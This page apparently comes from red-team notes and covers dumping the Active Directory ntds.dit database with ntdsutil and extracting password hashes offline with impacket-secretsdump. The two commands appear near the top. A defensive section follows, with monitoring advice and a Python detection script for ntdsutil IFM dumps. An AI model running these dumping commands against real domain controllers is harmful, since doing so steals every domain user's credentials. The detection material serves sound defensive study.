NTDS - Domain Controller

Dumping and enumerating NTDS.dit - the Active Directory database file that holds information about domain users (including their password hashes!).

Execution

Dumping the required files to c:\temp using the native Windows binary ntdsutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can see that ntds.dit, together with the SYSTEM and SECURITY registry hives, is dumped to c:\temp:

We can then extract the password hashes offline from those files:

[email protected]~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

Observations

On the victim machine, no surprises:

Monitoring command-line arguments is, as usual, a good idea, as it can reveal attempts to dump ntds.dit:

Additionally, there are multiple Application log entries that can indicate activity around ntds.dit and that you may want to investigate further:
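A defender-side check for the command-line telemetry discussed above, added here as an example and not part of the original page: it scans process-creation events for ntdsutil.exe being driven through "ifm" / "create full", which is the pattern that produces the dump. The event records are constructed sample data shaped after Windows Security 4688 / Sysmon process-creation fields; the field names and the helper functions are assumptions.

```python
import re

# Constructed sample process-creation events (field names loosely modelled on
# Windows Security 4688 / Sysmon Event ID 1; this is not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": 'ntdsutil.exe "ac i ntds" "ifm" "create full c:\\temp" q q',
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 4688, "Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": 'ntdsutil.exe "activate instance ntds" "ifm" "create full D:\\backup\\ifm" quit quit',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4688, "Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": 'ntdsutil.exe "ac i ntds" "files" "info" q q',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 4688, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe ifm.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# ntdsutil accepts abbreviated commands ("ac i ntds" vs "activate instance ntds"),
# so match on the ifm / create keywords rather than on one exact command string.
# "create sysvol full <path>" is covered as well as "create full <path>".
IFM_RE = re.compile(r"\bifm\b.*\bcreate\s+(full|sysvol)\b", re.IGNORECASE)


def is_ntds_ifm_dump(event):
    """True when the event is ntdsutil.exe invoked with an IFM 'create' command."""
    image = event.get("Image", "").lower()
    command_line = event.get("CommandLine", "")
    return image.endswith("\\ntdsutil.exe") and IFM_RE.search(command_line) is not None


def find_ntds_dumps(events):
    """Return (Image, CommandLine, ParentImage) for every event that looks like an IFM dump.

    The parent image is kept because the page's example launches ntdsutil via powershell,
    which is useful triage context for the analyst."""
    return [(e["Image"], e["CommandLine"], e["ParentImage"])
            for e in events if is_ntds_ifm_dump(e)]


if __name__ == "__main__":
    for hit in find_ntds_dumps(SAMPLE_EVENTS):
        print("suspected ntds.dit IFM dump:", hit)
```

Benign ntdsutil usage such as "files info" is not flagged, so pair this with the Application log review mentioned above rather than alerting on ntdsutil.exe alone.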
